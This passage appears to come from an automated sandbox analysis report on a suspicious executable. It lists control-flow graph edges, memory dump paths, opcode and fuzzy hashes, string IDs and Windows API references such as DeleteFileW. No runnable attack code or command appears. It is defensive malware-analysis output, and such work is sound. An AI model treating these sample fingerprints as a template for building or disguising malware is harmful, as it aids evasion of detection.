6b45a7f-6b45ab2 1427->1429 1428->1426 1430 6b45b36-6b45b69 1428->1430 1439 6b45ab4 1429->1439 1440 6b45ab7-6b45af8 1429->1440 1442 6b45b6e-6b45b9b 1430->1442 1443 6b45b6b 1430->1443 1439->1440 1451 6b45b10-6b45b17 1440->1451 1452 6b45afa-6b45b0b 1440->1452 1442->1408 1443->1442 1453 6b45b1f-6b45b21 1451->1453 1452->1408 1453->1408
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $
                                                        • API String ID: 0-3993045852
                                                        • Opcode ID: 1131d4cf680370c4ab628a8b354033c8dc894837ffa60da7c73cb0dd8c295f15
                                                        • Instruction ID: d51dd186cf08f36d7ffd1aa0d7d33813974bca756f435933df7c49260eedbe32
                                                        • Opcode Fuzzy Hash: 1131d4cf680370c4ab628a8b354033c8dc894837ffa60da7c73cb0dd8c295f15
                                                        • Instruction Fuzzy Hash: BF22C1B2E006199FDF64EFA8C4806AEB7B2FF85310F2084A9D419AB344DB35DD45CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B465D0 Relevance: .8, Instructions: 824COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 07a4fd8173a96d7d0e24439904e150c1fa52b542f24148d3a78f31290d9d8c19
                                                        • Instruction ID: 7a95448407f350a64b99804e020a3e9e4ca5de35ecbe86b9e3751a607a9efed7
                                                        • Opcode Fuzzy Hash: 07a4fd8173a96d7d0e24439904e150c1fa52b542f24148d3a78f31290d9d8c19
                                                        • Instruction Fuzzy Hash: 2662C070B002059FDB54EB68D584BADB7F2EF89314F1494A9E406EB391EB35EC46DB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B4B1F0 Relevance: .6, Instructions: 563COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9f72d9cfe02dfc655f04e5b79fcdcb0daa6334d9b01f5400a7c09c8a87f38b67
                                                        • Instruction ID: ada8bd55e2bb0dbd8b31ff71368550c2862455e88cd8a86e6f851a61b6e23652
                                                        • Opcode Fuzzy Hash: 9f72d9cfe02dfc655f04e5b79fcdcb0daa6334d9b01f5400a7c09c8a87f38b67
                                                        • Instruction Fuzzy Hash: FF2293B0E101099FDF64EB6CD4807ADB7B6FB89310F209965E509EB391CA39DC81DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B4AC98 Relevance: 10.4, Strings: 8, Instructions: 391COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 6b4ac98-6b4acb6 1 6b4acb8-6b4acbb 0->1 2 6b4acbd-6b4acd9 1->2 3 6b4acde-6b4ace1 1->3 2->3 4 6b4ace3-6b4ace8 3->4 5 6b4aceb-6b4acee 3->5 4->5 7 6b4acf0-6b4acf4 5->7 8 6b4acff-6b4ad02 5->8 9 6b4aec4-6b4aece 7->9 10 6b4acfa 7->10 11 6b4ad04-6b4ad0d 8->11 12 6b4ad12-6b4ad15 8->12 10->8 11->12 14 6b4ad17-6b4ad24 12->14 15 6b4ad29-6b4ad2c 12->15 14->15 16 6b4ad46-6b4ad49 15->16 17 6b4ad2e-6b4ad37 15->17 21 6b4aeb5-6b4aebe 16->21 22 6b4ad4f-6b4ad52 16->22 19 6b4ad3d-6b4ad41 17->19 20 6b4aecf-6b4af06 17->20 19->16 28 6b4af08-6b4af0b 20->28 21->9 21->17 23 6b4ad54-6b4ad67 22->23 24 6b4ad6c-6b4ad6e 22->24 23->24 26 6b4ad75-6b4ad78 24->26 27 6b4ad70 24->27 26->1 30 6b4ad7e-6b4ada2 26->30 27->26 31 6b4af0d-6b4af11 28->31 32 6b4af18-6b4af1b 28->32 45 6b4aeb2 30->45 46 6b4ada8-6b4adb7 30->46 33 6b4af13 31->33 34 6b4af69-6b4afa4 31->34 35 6b4af1d-6b4af39 32->35 36 6b4af3e-6b4af41 32->36 33->32 48 6b4b197-6b4b1aa 34->48 49 6b4afaa-6b4afb6 34->49 35->36 38 6b4af43-6b4af4d 36->38 39 6b4af4e-6b4af51 36->39 41 6b4af60-6b4af63 39->41 42 6b4af53 call 6b4b1f0 39->42 41->34 47 6b4b1cc-6b4b1ce 41->47 51 6b4af59-6b4af5b 42->51 45->21 60 6b4adcf-6b4ae0a call 6b46580 46->60 61 6b4adb9-6b4adbf 46->61 53 6b4b1d5-6b4b1d8 47->53 54 6b4b1d0 47->54 52 6b4b1ac 48->52 58 6b4afd6-6b4b01a 49->58 59 6b4afb8-6b4afd1 49->59 51->41 62 6b4b1ad 52->62 53->28 55 6b4b1de-6b4b1e8 53->55 54->53 78 6b4b036-6b4b075 58->78 79 6b4b01c-6b4b02e 58->79 59->52 76 6b4ae22-6b4ae39 60->76 77 6b4ae0c-6b4ae12 60->77 63 6b4adc1 61->63 64 6b4adc3-6b4adc5 61->64 62->62 63->60 64->60 91 6b4ae51-6b4ae62 76->91 92 6b4ae3b-6b4ae41 76->92 80 6b4ae14 77->80 81 6b4ae16-6b4ae18 77->81 85 6b4b15c-6b4b171 78->85 86 6b4b07b-6b4b156 call 6b46580 78->86 79->78 80->76 81->76 85->48 86->85 98 6b4ae64-6b4ae6a 91->98 99 6b4ae7a-6b4aeab 91->99 94 6b4ae45-6b4ae47 92->94 95 6b4ae43 92->95 94->91 95->91 100 6b4ae6c 98->100 101 6b4ae6e-6b4ae70 98->101 99->45 100->99 101->99
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-3823777903
                                                        • Opcode ID: af8a183296e51d18f86370325629218f94929b07d74c5c555f29249544290a45
                                                        • Instruction ID: 3240a8bdc0b14aea2fa9f485e8ba9d4c912aecee574c840669e9abadfdd96530
                                                        • Opcode Fuzzy Hash: af8a183296e51d18f86370325629218f94929b07d74c5c555f29249544290a45
                                                        • Instruction Fuzzy Hash: A4E18F70F5021A8FDB69EF69D5846AEB7B2FF84304F208569D409AB358DB34DC46CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B4B610 Relevance: 8.0, Strings: 6, Instructions: 470COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 255 6b4b610-6b4b632 256 6b4b634-6b4b637 255->256 257 6b4b639-6b4b696 call 6b46580 256->257 258 6b4b69b-6b4b69e 256->258 257->258 259 6b4b6a4-6b4b6a7 258->259 260 6b4b7e2-6b4b7e3 258->260 262 6b4b6be-6b4b6c1 259->262 263 6b4b6a9-6b4b6ad 259->263 261 6b4b7e8-6b4b7eb 260->261 265 6b4b80d-6b4b810 261->265 266 6b4b7ed-6b4b808 261->266 270 6b4b6c3-6b4b6c6 262->270 271 6b4b6d8-6b4b6db 262->271 267 6b4b9a7-6b4b9de 263->267 268 6b4b6b3-6b4b6b9 263->268 272 6b4b812-6b4b815 265->272 273 6b4b81a-6b4b81d 265->273 266->265 284 6b4b9e0-6b4b9e3 267->284 268->262 270->267 275 6b4b6cc-6b4b6d3 270->275 276 6b4b6dd-6b4b6e6 271->276 277 6b4b6eb-6b4b6ee 271->277 272->273 282 6b4b887-6b4b890 273->282 283 6b4b81f-6b4b822 273->283 275->271 276->277 278 6b4b6f0-6b4b705 277->278 279 6b4b72c-6b4b72f 277->279 278->267 310 6b4b70b-6b4b727 278->310 285 6b4b731-6b4b746 279->285 286 6b4b76e-6b4b771 279->286 287 6b4b896 282->287 288 6b4b913-6b4b91c 282->288 289 6b4b824-6b4b82b 283->289 290 6b4b836-6b4b839 283->290 293 6b4b9e5-6b4ba01 284->293 294 6b4ba06-6b4ba09 284->294 285->267 327 6b4b74c-6b4b769 285->327 301 6b4b783-6b4b786 286->301 302 6b4b773 286->302 296 6b4b89b-6b4b89e 287->296 288->267 298 6b4b922-6b4b929 288->298 289->276 297 6b4b831 289->297 299 6b4b85c-6b4b85f 290->299 300 6b4b83b-6b4b857 290->300 293->294 311 6b4bc75-6b4bc77 294->311 312 6b4ba0f-6b4ba37 294->312 308 6b4b8c5-6b4b8c8 296->308 309 6b4b8a0-6b4b8a4 296->309 297->290 314 6b4b92e-6b4b931 298->314 306 6b4b861-6b4b865 299->306 307 6b4b882-6b4b885 299->307 300->299 304 6b4b790-6b4b793 301->304 305 6b4b788-6b4b78b 301->305 318 6b4b77b-6b4b77e 302->318 319 6b4b795-6b4b79e 304->319 320 6b4b7a3-6b4b7a6 304->320 305->304 306->267 321 6b4b86b-6b4b87b 306->321 307->282 307->296 308->260 325 6b4b8ce-6b4b8d1 308->325 309->267 324 6b4b8aa-6b4b8ba 309->324 310->279 322 6b4bc7e-6b4bc81 311->322 323 6b4bc79 311->323 371 6b4ba41-6b4ba85 312->371 372 6b4ba39-6b4ba3c 312->372 315 6b4b941-6b4b944 314->315 316 6b4b933-6b4b93c 314->316 328 6b4b946-6b4b94c 315->328 329 6b4b951-6b4b954 315->329 316->315 318->301 319->320 320->260 331 6b4b7a8-6b4b7ab 320->331 334 6b4b8d3-6b4b8d7 321->334 352 6b4b87d 321->352 322->284 332 6b4bc87-6b4bc90 322->332 323->322 324->260 355 6b4b8c0 324->355 333 6b4b8f4-6b4b8f7 325->333 325->334 327->286 328->329 338 6b4b956-6b4b95b 329->338 339 6b4b95e-6b4b961 329->339 341 6b4b7b2-6b4b7b5 331->341 342 6b4b7ad-6b4b7af 331->342 346 6b4b90e-6b4b911 333->346 347 6b4b8f9-6b4b8fd 333->347 334->267 344 6b4b8dd-6b4b8ed 334->344 338->339 350 6b4b974-6b4b977 339->350 351 6b4b963-6b4b967 339->351 353 6b4b7b7-6b4b7ba 341->353 354 6b4b7bc-6b4b7bf 341->354 342->341 344->309 370 6b4b8ef 344->370 346->288 346->314 347->267 356 6b4b903-6b4b909 347->356 359 6b4b979-6b4b985 350->359 360 6b4b98a-6b4b98c 350->360 351->267 358 6b4b969-6b4b96f 351->358 352->307 353->354 361 6b4b7ca-6b4b7cd 353->361 354->270 362 6b4b7c5 354->362 355->308 356->346 358->350 359->360 366 6b4b993-6b4b996 360->366 367 6b4b98e 360->367 368 6b4b7dd-6b4b7e0 361->368 369 6b4b7cf-6b4b7d8 361->369 362->361 366->256 374 6b4b99c-6b4b9a6 366->374 367->366 368->260 368->261 369->368 370->333 378 6b4bc6a-6b4bc74 371->378 379 6b4ba8b-6b4ba94 371->379 372->332 380 6b4bc60-6b4bc65 379->380 381 6b4ba9a-6b4bb06 call 6b46580 379->381 380->378 389 6b4bc00-6b4bc15 381->389 390 6b4bb0c-6b4bb11 381->390 389->380 392 6b4bb13-6b4bb19 390->392 393 6b4bb2d 390->393 394 6b4bb1f-6b4bb21 392->394 395 6b4bb1b-6b4bb1d 392->395 396 6b4bb2f-6b4bb35 393->396 397 6b4bb2b 394->397 395->397 398 6b4bb37-6b4bb3d 396->398 399 6b4bb4a-6b4bb57 396->399 397->396 400 6b4bb43 398->400 401 6b4bbeb-6b4bbfa 398->401 405 6b4bb6f-6b4bb7c 399->405 406 6b4bb59-6b4bb5f 399->406 400->399 403 6b4bbb2-6b4bbbf 400->403 404 6b4bb7e-6b4bb8b 400->404 401->389 401->390 415 6b4bbd7-6b4bbe4 403->415 416 6b4bbc1-6b4bbc7 403->416 413 6b4bba3-6b4bbb0 404->413 414 6b4bb8d-6b4bb93 404->414 405->401 408 6b4bb61 406->408 409 6b4bb63-6b4bb65 406->409 408->405 409->405 413->401 417 6b4bb95 414->417 418 6b4bb97-6b4bb99 414->418 415->401 419 6b4bbc9 416->419 420 6b4bbcb-6b4bbcd 416->420 417->413 418->413 419->415 420->415
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-2392861976
                                                        • Opcode ID: 4d9ae1ddebadaa230f203323ba4ed4d787e5840195239c28feb0a05e1ef176fc
                                                        • Instruction ID: d20e12f9624e66ddd406cdb13c00b2a7de057358522e17e0f575cdbe4a1207e5
                                                        • Opcode Fuzzy Hash: 4d9ae1ddebadaa230f203323ba4ed4d787e5840195239c28feb0a05e1ef176fc
                                                        • Instruction Fuzzy Hash: E802AFB0E1020A9FDF64EF68C5806ADB7B2FB84304F1085AAE505DB355DB35EC86DB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B49120 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 423 6b49120-6b49145 424 6b49147-6b4914a 423->424 425 6b49170-6b49173 424->425 426 6b4914c-6b4916b 424->426 427 6b49a33-6b49a35 425->427 428 6b49179-6b4918e 425->428 426->425 430 6b49a37 427->430 431 6b49a3c-6b49a3f 427->431 435 6b491a6-6b491bc 428->435 436 6b49190-6b49196 428->436 430->431 431->424 433 6b49a45-6b49a4f 431->433 440 6b491c7-6b491c9 435->440 437 6b49198 436->437 438 6b4919a-6b4919c 436->438 437->435 438->435 441 6b491e1-6b49252 440->441 442 6b491cb-6b491d1 440->442 453 6b49254-6b49277 441->453 454 6b4927e-6b4929a 441->454 443 6b491d5-6b491d7 442->443 444 6b491d3 442->444 443->441 444->441 453->454 459 6b492c6-6b492e1 454->459 460 6b4929c-6b492bf 454->460 465 6b492e3-6b49305 459->465 466 6b4930c-6b49327 459->466 460->459 465->466 471 6b49352-6b4935c 466->471 472 6b49329-6b4934b 466->472 473 6b4936c-6b493e6 471->473 474 6b4935e-6b49367 471->474 472->471 480 6b49433-6b49448 473->480 481 6b493e8-6b49406 473->481 474->433 480->427 485 6b49422-6b49431 481->485 486 6b49408-6b49417 481->486 485->480 485->481 486->485
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q
                                                        • API String ID: 0-2125118731
                                                        • Opcode ID: 3dfa6291f6482f9df8f8c7d3e124dfa8b23dfced40fd28bcd8d223f077c151b7
                                                        • Instruction ID: 0878ef74a94dbc383fd1ea31c7cf10bd81979d05fbdceda740195796c1d92735
                                                        • Opcode Fuzzy Hash: 3dfa6291f6482f9df8f8c7d3e124dfa8b23dfced40fd28bcd8d223f077c151b7
                                                        • Instruction Fuzzy Hash: 02913C70B0021A9FDB54EF65D8507AFB3F6FF89240F1085A9D809EB384EE749D468B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B4CF08 Relevance: 4.6, Strings: 3, Instructions: 803COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 489 6b4cf08-6b4cf23 490 6b4cf25-6b4cf28 489->490 491 6b4cf71-6b4cf74 490->491 492 6b4cf2a-6b4cf6c 490->492 493 6b4cf76-6b4cf7b 491->493 494 6b4cf7e-6b4cf81 491->494 492->491 493->494 496 6b4cfa4-6b4cfa7 494->496 497 6b4cf83-6b4cf9f 494->497 498 6b4cfb6-6b4cfb9 496->498 499 6b4cfa9-6b4cfab 496->499 497->496 503 6b4d002-6b4d005 498->503 504 6b4cfbb-6b4cffd 498->504 501 6b4cfb1 499->501 502 6b4d2af-6b4d2b8 499->502 501->498 508 6b4d2c7-6b4d2d3 502->508 509 6b4d2ba-6b4d2bf 502->509 506 6b4d014-6b4d017 503->506 507 6b4d007-6b4d009 503->507 504->503 513 6b4d060-6b4d063 506->513 514 6b4d019-6b4d05b 506->514 511 6b4d3f1 507->511 512 6b4d00f 507->512 517 6b4d3e4-6b4d3e9 508->517 518 6b4d2d9-6b4d2ed 508->518 509->508 519 6b4d3f4-6b4d400 511->519 512->506 520 6b4d065-6b4d0a7 513->520 521 6b4d0ac-6b4d0af 513->521 514->513 517->511 518->511 535 6b4d2f3-6b4d305 518->535 522 6b4d406-6b4d6f3 519->522 523 6b4d1ea-6b4d1f9 519->523 520->521 529 6b4d0b1-6b4d0c0 521->529 530 6b4d0f8-6b4d0fb 521->530 702 6b4d6f9-6b4d6ff 522->702 703 6b4d91a-6b4d924 522->703 533 6b4d208-6b4d214 523->533 534 6b4d1fb-6b4d200 523->534 536 6b4d0c2-6b4d0c7 529->536 537 6b4d0cf-6b4d0db 529->537 530->519 532 6b4d101-6b4d104 530->532 541 6b4d106-6b4d148 532->541 542 6b4d14d-6b4d150 532->542 538 6b4d925-6b4d95e 533->538 546 6b4d21a-6b4d22c 533->546 534->533 552 6b4d307-6b4d30d 535->552 553 6b4d329-6b4d32b 535->553 536->537 537->538 539 6b4d0e1-6b4d0f3 537->539 565 6b4d960-6b4d963 538->565 539->530 541->542 547 6b4d152-6b4d194 542->547 548 6b4d199-6b4d19c 542->548 562 6b4d231-6b4d234 546->562 547->548 559 6b4d1e5-6b4d1e8 548->559 560 6b4d19e-6b4d1e0 548->560 563 6b4d311-6b4d31d 552->563 564 6b4d30f 552->564 567 6b4d335-6b4d341 553->567 559->523 559->562 560->559 569 6b4d236-6b4d278 562->569 570 6b4d27d-6b4d280 562->570 571 6b4d31f-6b4d327 563->571 564->571 572 6b4d965-6b4d981 565->572 573 6b4d986-6b4d989 565->573 590 6b4d343-6b4d34d 567->590 591 6b4d34f 567->591 569->570 585 6b4d282-6b4d298 570->585 586 6b4d29d-6b4d29f 570->586 571->567 572->573 582 6b4d9bc-6b4d9bf 573->582 583 6b4d98b-6b4d9b7 573->583 593 6b4d9c1 call 6b4da7d 582->593 594 6b4d9ce-6b4d9d0 582->594 583->582 585->586 596 6b4d2a6-6b4d2a9 586->596 597 6b4d2a1 586->597 601 6b4d354-6b4d356 590->601 591->601 610 6b4d9c7-6b4d9c9 593->610 603 6b4d9d7-6b4d9da 594->603 604 6b4d9d2 594->604 596->490 596->502 597->596 601->511 608 6b4d35c-6b4d378 call 6b46580 601->608 603->565 611 6b4d9dc-6b4d9eb 603->611 604->603 631 6b4d387-6b4d393 608->631 632 6b4d37a-6b4d37f 608->632 610->594 624 6b4da52-6b4da67 611->624 625 6b4d9ed-6b4da50 call 6b46580 611->625 634 6b4da68 624->634 625->624 631->517 637 6b4d395-6b4d3e2 631->637 632->631 634->634 637->511 704 6b4d701-6b4d706 702->704 705 6b4d70e-6b4d717 702->705 704->705 705->538 706 6b4d71d-6b4d730 705->706 708 6b4d736-6b4d73c 706->708 709 6b4d90a-6b4d914 706->709 710 6b4d73e-6b4d743 708->710 711 6b4d74b-6b4d754 708->711 709->702 709->703 710->711 711->538 712 6b4d75a-6b4d77b 711->712 715 6b4d77d-6b4d782 712->715 716 6b4d78a-6b4d793 712->716 715->716 716->538 717 6b4d799-6b4d7b6 716->717 717->709 720 6b4d7bc-6b4d7c2 717->720 720->538 721 6b4d7c8-6b4d7e1 720->721 723 6b4d7e7-6b4d80e 721->723 724 6b4d8fd-6b4d904 721->724 723->538 727 6b4d814-6b4d81e 723->727 724->709 724->720 727->538 728 6b4d824-6b4d83b 727->728 730 6b4d83d-6b4d848 728->730 731 6b4d84a-6b4d865 728->731 730->731 731->724 736 6b4d86b-6b4d884 call 6b46580 731->736 740 6b4d886-6b4d88b 736->740 741 6b4d893-6b4d89c 736->741 740->741 741->538 742 6b4d8a2-6b4d8f6 741->742 742->724
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q
                                                        • API String ID: 0-831282457
                                                        • Opcode ID: dbbaeb8646a9e64a6aa8517fe3671ad1f74d14f97f264a5480c7fb8bdf4cce7d
                                                        • Instruction ID: 9cdfc6c66df8effd166cd4c27c1053629cf70905050f684af606fa70b8edbe6e
                                                        • Opcode Fuzzy Hash: dbbaeb8646a9e64a6aa8517fe3671ad1f74d14f97f264a5480c7fb8bdf4cce7d
                                                        • Instruction Fuzzy Hash: 16624070A0021A9FCB55EF68D590A5DBBF2FF84304B108A79D0099F365DB75ED8ACB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B44B40 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 750 6b44b40-6b44b64 751 6b44b66-6b44b69 750->751 752 6b44b6f-6b44c67 751->752 753 6b45248-6b4524b 751->753 773 6b44c6d-6b44cba call 6b453e8 752->773 774 6b44cea-6b44cf1 752->774 754 6b4526c-6b4526e 753->754 755 6b4524d-6b45267 753->755 757 6b45275-6b45278 754->757 758 6b45270 754->758 755->754 757->751 760 6b4527e-6b4528b 757->760 758->757 787 6b44cc0-6b44cdc 773->787 775 6b44d75-6b44d7e 774->775 776 6b44cf7-6b44d67 774->776 775->760 793 6b44d72 776->793 794 6b44d69 776->794 791 6b44ce7-6b44ce8 787->791 792 6b44cde 787->792 791->774 792->791 793->775 794->793
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: fcq$XPcq$\Ocq
                                                        • API String ID: 0-3575482020
                                                        • Opcode ID: b52a56f214448543f5cb2b821742127a979ccdf9ecbc8ae67f5adaa05ba3f2c0
                                                        • Instruction ID: 6f29fc0f00e69c8df09f61aa42f797639acccc39113e3f7178e1a13e7c78a866
                                                        • Opcode Fuzzy Hash: b52a56f214448543f5cb2b821742127a979ccdf9ecbc8ae67f5adaa05ba3f2c0
                                                        • Instruction Fuzzy Hash: E7618170F002199FEB54DFA8C8547AEBBF6FB88700F20852AE106AB395DF754C459B51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B49110 Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1174 6b49110-6b49145 1176 6b49147-6b4914a 1174->1176 1177 6b49170-6b49173 1176->1177 1178 6b4914c-6b4916b 1176->1178 1179 6b49a33-6b49a35 1177->1179 1180 6b49179-6b4918e 1177->1180 1178->1177 1182 6b49a37 1179->1182 1183 6b49a3c-6b49a3f 1179->1183 1187 6b491a6-6b491bc 1180->1187 1188 6b49190-6b49196 1180->1188 1182->1183 1183->1176 1185 6b49a45-6b49a4f 1183->1185 1192 6b491c7-6b491c9 1187->1192 1189 6b49198 1188->1189 1190 6b4919a-6b4919c 1188->1190 1189->1187 1190->1187 1193 6b491e1-6b49252 1192->1193 1194 6b491cb-6b491d1 1192->1194 1205 6b49254-6b49277 1193->1205 1206 6b4927e-6b4929a 1193->1206 1195 6b491d5-6b491d7 1194->1195 1196 6b491d3 1194->1196 1195->1193 1196->1193 1205->1206 1211 6b492c6-6b492e1 1206->1211 1212 6b4929c-6b492bf 1206->1212 1217 6b492e3-6b49305 1211->1217 1218 6b4930c-6b49327 1211->1218 1212->1211 1217->1218 1223 6b49352-6b4935c 1218->1223 1224 6b49329-6b4934b 1218->1224 1225 6b4936c-6b493e6 1223->1225 1226 6b4935e-6b49367 1223->1226 1224->1223 1232 6b49433-6b49448 1225->1232 1233 6b493e8-6b49406 1225->1233 1226->1185 1232->1179 1237 6b49422-6b49431 1233->1237 1238 6b49408-6b49417 1233->1238 1237->1232 1237->1233 1238->1237
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q
                                                        • API String ID: 0-355816377
                                                        • Opcode ID: 4e7a67487b328d6daec23d94d2e06fef5fcfae40c73c34440166137bcb4aa038
                                                        • Instruction ID: 71d7e9c8f570821634d63c272beb2bfd9032b48eb7ef6e480ce4939da2ec4aed
                                                        • Opcode Fuzzy Hash: 4e7a67487b328d6daec23d94d2e06fef5fcfae40c73c34440166137bcb4aa038
                                                        • Instruction Fuzzy Hash: BA517E70B00216AFDB54EB74D850B6FB7FAEBC8644F108569D809EB384DE34DC428B95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01408168 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1455 1408168-14081ba 1458 14081c2-14081ed DeleteFileW 1455->1458 1459 14081bc-14081bf 1455->1459 1460 14081f6-140821e 1458->1460 1461 14081ef-14081f5 1458->1461 1459->1458 1461->1460
                                                        APIs
                                                        • DeleteFileW.KERNELBASE(00000000), ref: 014081E0
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4074154183.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_1400000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: DeleteFile
                                                        • String ID:
                                                        • API String ID: 4033686569-0
                                                        • Opcode ID: 6fe69de5314259592ca01696a177b920cf035f103680d4857953a7895bc478d2
                                                        • Instruction ID: dc1a23f8e137064e581c6d9a208bc2c505cdd2e619b061f6636ba3d01379639b
                                                        • Opcode Fuzzy Hash: 6fe69de5314259592ca01696a177b920cf035f103680d4857953a7895bc478d2
                                                        • Instruction Fuzzy Hash: 3D2147B1C0065A9FDB10CF9AD9457DEFBF4BF48320F10812AD858A7251D738A940CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01408170 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1464 1408170-14081ba 1466 14081c2-14081ed DeleteFileW 1464->1466 1467 14081bc-14081bf 1464->1467 1468 14081f6-140821e 1466->1468 1469 14081ef-14081f5 1466->1469 1467->1466 1469->1468
                                                        APIs
                                                        • DeleteFileW.KERNELBASE(00000000), ref: 014081E0
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4074154183.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_1400000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: DeleteFile
                                                        • String ID:
                                                        • API String ID: 4033686569-0
                                                        • Opcode ID: 4112c2c66b3a4a9d6e7fe4245efa4258bdfcdcdfd0a0a49447e20ed478b8f1d7
                                                        • Instruction ID: 78a3b7e16e18f14e30fb8ea134249a1b64ae12d10e60e57abacc009315f1227e
                                                        • Opcode Fuzzy Hash: 4112c2c66b3a4a9d6e7fe4245efa4258bdfcdcdfd0a0a49447e20ed478b8f1d7
                                                        • Instruction Fuzzy Hash: 2D1133B1C0061A9BCB14CF9AC544B9EFBB4BF48320F10812AD858B7250D738A940CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0140F086 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1472 140f086-140f0fc GlobalMemoryStatusEx 1475 140f105-140f12d 1472->1475 1476 140f0fe-140f104 1472->1476 1476->1475
                                                        APIs
